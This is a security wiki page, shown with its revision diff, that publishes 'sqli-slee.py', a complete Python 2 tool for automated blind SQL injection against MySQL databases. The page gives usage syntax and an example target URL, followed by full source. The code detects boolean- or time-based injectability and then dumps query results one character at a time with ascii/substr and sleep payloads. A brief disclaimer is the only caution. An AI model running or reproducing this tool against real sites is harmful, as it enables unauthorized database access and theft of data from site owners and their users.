Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "SQL injection/mysqli-blindutils/sqli-slee.py"

From NetSec
Jump to: navigation, search
 
(5 intermediate revisions by 2 users not shown)
Line 1: Line 1:
{{info|<center>This script uses time and boolean based blind [[SQL injection]] to obtain the desired information from MySQL database.</center>}}
+
{{info|<center>This [[python]] script uses time and [[boolean enumeration|boolean]] based blind [[SQL injection]] to obtain the desired information from [[MySQL]] [[database]]s.</center>}}
 +
 
 +
<font size="-2">Special thanks to [[User:Dilon|Dilon]] for this tool.</font>
  
 
=Info=
 
=Info=
 +
{{main|mysqli-blindutils}}
 
The syntax of this script is:
 
The syntax of this script is:
 
   python sqli-slee.py -u [url] -i [injection]
 
   python sqli-slee.py -u [url] -i [injection]

Latest revision as of 02:57, 21 November 2012

c3el4.png
This python script uses time and boolean based blind SQL injection to obtain the desired information from MySQL databases.

Special thanks to Dilon for this tool.

Info

Main article: mysqli-blindutils

The syntax of this script is:

 python sqli-slee.py -u [url] -i [injection]

Example

 python sqli-slee.py -u "http://target.com/?id=1%27" -i "select database()"

Disclaimer

RPU0j.png The end-user is liable for his-or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act.

Source

 
#!/usr/bin/python2.7
 
import sys,re,urllib2,string,time
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError
 
def request(URL):
    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
    req = urllib2.Request(URL, None, user_agent)
 
    try:
        request = urllib2.urlopen(req)
 
    except HTTPError, e:
        print('[!] The server couldnt fulfill the request.')
        print('[!] Error code: ' + str(e.code))
        sys.exit(1)
 
    except URLError, e:
        print('[!] We failed to reach a server.')
        print('[!] Reason: ' + str(e.reason))
        sys.exit(1)
 
    return len(request.read())
 
def value(URL):
    target = 0
    end = 0
    next_maybe = 0
    floor = 0
    ceiling = 255
    maybe = int(ceiling)/2
 
    while(end != 9):
        if(is_what(URL, maybe, '>')):	
            floor = maybe
            next_maybe = int(maybe + ((ceiling - floor)/2))
 
        elif(is_what(URL, maybe, '<')):
            ceiling = maybe
            next_maybe = int(maybe - ((ceiling - floor)/2))
 
        elif(is_what(URL, maybe, '=')):
            return chr(maybe)
 
        maybe = next_maybe
        end += 1
 
    return 'done'
 
def is_what(URL, maybe, op):
    if(sqli_type == 'boolean'):
        ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+'))
        if(TrueResponse == ValueResponse):
            return 1
        else:
            return 0
    elif(sqli_type == 'time'):
        start = time.time()
        ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+')
        elapsed_time = (time.time() - start)
        if (elapsed_time > 2):
            return 1
        else:
            return 0
 
def vuln_check(URL):
    print('[+] Checking site...')
 
    global TrueResponse
    TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
    FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
 
    if(TrueResponse != FalseResponse):
        print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
        return 'boolean'
    else:
        start = time.time()
        SleepResponse = request(URL + '%20and%20sleep(5)--+')
        elapsed_time = (time.time() - start)
 
        if(elapsed_time > 5):
            print('[+] Site seems to be vulnerable to time based blind SQL injection.') 
            return 'time'
        else:
            print('[!] Seems like site isnt vulnerable to blind SQL injection.')
            sys.exit(1)
 
def main():
    print('''
                Auto BSQLi tool for MySQL
                ''')
 
    usage = 'usage: %prog -u <target> -i <injection>'
    parser = OptionParser(usage=usage)
    parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
    parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
 
    (options, args) = parser.parse_args()
    if(options.URL and options.INJECTION):
        URL = options.URL
        INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))
    else:
        print('[!] Missing url or injection parameter.')
        print('[!] Use --help.')
        sys.exit(1)
 
    global sqli_type
    sqli_type = vuln_check(URL)
    position = 1
    dump = ''
    print('[+] Dumping data...')
 
    while(1):
        if(sqli_type == 'boolean'):
            letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
        elif(sqli_type == 'time'):
            letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
 
        if(letter == 'done'):
            break
 
        dump = dump + letter
        position += 1
 
    if(dump):
        print('[+] Data: ' + dump)
    else:
        print('[!] No data dumped. Check your injection.')
 
if __name__ == "__main__":
    main()